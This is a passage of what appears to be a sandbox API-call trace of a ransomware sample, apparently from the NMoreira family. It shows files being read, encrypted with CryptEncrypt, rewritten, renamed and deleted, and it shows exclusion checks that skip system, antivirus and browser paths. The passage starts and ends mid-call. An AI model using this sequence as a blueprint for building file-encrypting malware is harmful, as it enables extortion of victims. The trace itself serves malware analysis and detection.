returned 1 [0151.307] GetLastError () returned 0x0 [0151.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.307] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.307] GetLastError () returned 0x0 [0151.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.307] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.307] GetLastError () returned 0x0 [0151.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.307] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.307] GetLastError () returned 0x0 [0151.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.307] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.307] GetLastError () returned 0x0 [0151.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.308] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.308] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.308] GetLastError () returned 0x0 [0151.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.308] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.308] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.308] GetLastError () returned 0x0 [0151.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.308] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.308] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.308] GetLastError () returned 0x0 [0151.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.308] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.308] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.308] GetLastError () returned 0x0 [0151.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.308] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.308] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.308] GetLastError () returned 0x0 [0151.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.308] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.308] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.308] GetLastError () returned 0x0 [0151.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.308] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.309] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.309] GetLastError () returned 0x0 [0151.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.309] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.309] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.309] GetLastError () returned 0x0 [0151.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.309] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.309] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.309] GetLastError () returned 0x0 [0151.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.309] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.309] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.309] GetLastError () returned 0x0 [0151.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.309] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.309] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.309] GetLastError () returned 0x0 [0151.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.309] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.309] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.309] GetLastError () returned 0x0 [0151.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.309] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.309] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.309] GetLastError () returned 0x0 [0151.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.310] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.310] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.310] GetLastError () returned 0x0 [0151.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.310] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.310] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.310] GetLastError () returned 0x0 [0151.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.316] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 1 [0151.316] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0 [0151.316] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" [0151.316] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0151.316] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC220.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc220.tmp")) returned 0xc220 [0151.317] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC220.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc220.tmp"), dwFlags=0x1) returned 0 [0151.317] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC220.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc220.tmp")) returned 1 [0151.317] CryptDestroyKey (hKey=0x9ad678) returned 1 [0151.317] wcslen (_String="OK") returned 0x2 [0151.317] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.317] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.317] CryptDestroyKey (hKey=0x9ad478) returned 1 [0151.317] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0151.317] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*NMCRYPT") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*Recovers your files.html") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*.exe") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*.dll") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*.lnk") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*.bat") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*.ini") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*.msi") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*.scf") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*pagefile.sys*") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*NTUSER.DAT*") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*AppData*") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\winrar\\*") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0151.317] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\java\\*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\windows\\*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\ESET\\*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\AVG\\*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\AVIRA\\*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*Atheros*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*Realtek*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*bootmgr*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*boot*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*boot*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*CONFIG.SYS*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*IO.SYS*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*MSDOS.SYS*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*NTDETECT.COM*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*ntldr*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*chrome*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*opera*") returned 0 [0151.318] PathMatchSpecW (pszFile="FlickLearningWizard.exe.mui", pszSpec="*firefox*") returned 0 [0151.318] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui", pszSpec="*") returned 1 [0151.318] strlen (_Str="NMoreira") returned 0x8 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.318] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.319] CryptGenRandom (in: hProv=0x8bf310, 